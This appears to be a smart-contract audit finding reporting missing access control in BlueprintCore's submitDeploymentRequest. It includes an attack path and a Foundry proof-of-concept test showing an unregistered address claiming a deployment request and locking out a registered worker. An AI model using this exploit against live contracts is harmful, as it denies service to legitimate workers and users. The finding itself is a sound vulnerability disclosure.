Wobbly Red Lion

High

# Missing access control in `BlueprintCore::submitDeploymentRequest` will cause denial of service  for legitimate workers

### Summary

Missing access control in `BlueprintCore::submitDeploymentRequest` will cause denial of service for legitimate workers as an attacker can claim deployment requests without proper registration.

https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L602

### Root Cause

In `BlueprintCore::submitDeploymentRequest` function lacks a check to verify if the caller is a registered worker. This allows any address to claim deployment requests regardless of their worker status.



Attack Path
- User creates deployment request (createProjectIDAndDeploymentRequest)

- Attacker calls submitDeploymentRequest with valid projectID/requestID

- System accepts attacker's submission without worker verification

- Attacker becomes assigned worker for the request

- Legitimate worker is blocked from claiming the already-assigned request

### Internal Pre-conditions

- Legitimate worker must have registered their public key via setWorkerPublicKey

- Attacker has NOT completed worker registration

- User must create a valid deployment request with createProjectIDAndDeploymentRequest

### External Pre-conditions

none

### Attack Path

- User creates deployment request (createProjectIDAndDeploymentRequest)

- Attacker calls submitDeploymentRequest with valid projectID/requestID
 
- System accepts attacker's submission without worker verification
 
- Attacker becomes assigned worker for the request
 
- Legitimate worker is blocked from claiming the already-assigned request

### Impact

Legitimate workers suffer denial of service as they cannot claim intended deployment requests. Users risk having their deployments processed by unwanted workers, potentially leading to service quality issues or security risks.

### PoC

put this code in your test folder

```solidity

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import "forge-std/Test.sol";
import "../src/BlueprintCore.sol";
import "./MockERC20.sol";
import "./MockERC721.sol";

contract BlueprintCoreVulnerabilityTest is Test {
    BlueprintCore blueprintCore;
    MockERC20 mockToken;
    MockERC721 mockNFT;

    address owner = address(0x1);
    address legitimateWorker = address(0x2);
    address attacker = address(0x3);
    address user = address(0x4);

    bytes publicKey = "0x010203";
    string serverURL = "https://example.com";
    string base64Proposal = "eyJ0eXBlIjoiREEiLCJsYXRlbmN5Ijo1LCJtYXhfdGhyb3VnaHB1dCI6MjB9";

    function setUp() public {
        blueprintCore = new BlueprintCore();
        mockToken = new MockERC20();
        mockNFT = new MockERC721();

        vm.startPrank(legitimateWorker);
        blueprintCore.setWorkerPublicKey(publicKey);
        vm.stopPrank();

        console.log("Legitimate worker address:", legitimateWorker);
    }

    function test_submitDeploymentRequest_vulnerability() public {
        vm.startPrank(user);

        bytes32 requestId = blueprintCore.createProjectIDAndDeploymentRequest(
            bytes32(uint256(0x1234)), 
            base64Proposal,
            serverURL
        );

        bytes32 projectId = blueprintCore.getLatestUserProjectID(user);

        console.log("Project ID:", vm.toString(projectId));
        console.log("Request ID:", vm.toString(requestId));
        vm.stopPrank();

        (BlueprintCore.Status status, address workerAddr) = blueprintCore.requestDeploymentStatus(requestId);
        assertEq(uint(status), uint(BlueprintCore.Status.Issued));
        assertEq(workerAddr, address(0));
        console.log("Step 1 completed - Deployment request created successfully");

        vm.startPrank(attacker);
        console.log("Attacker trying to submit deployment request...");
        bool success = blueprintCore.submitDeploymentRequest(projectId, requestId);
        vm.stopPrank();

        console.log("Step 2 completed - Attacker was able to submit deployment request:", success);

        (BlueprintCore.Status statusAfter, address workerAfter) = blueprintCore.requestDeploymentStatus(requestId);

        assertTrue(success, "Attacker should be able to submit deployment request");
        assertEq(uint(statusAfter), uint(BlueprintCore.Status.Pickup));
        assertEq(workerAfter, attacker);
        console.log("Step 3 completed - Verified attacker claimed the deployment request");

        vm.startPrank(legitimateWorker);
        console.log("Legitimate worker trying to submit the same deployment request...");
        vm.expectRevert("requestID already picked by another worker, try a different requestID");
        blueprintCore.submitDeploymentRequest(projectId, requestId);
        vm.stopPrank();

        console.log("Step 4 completed - Legitimate worker was blocked as expected");
    }
} 

```

### Mitigation

Add a verification or some type of registration for workers to prevent such attacks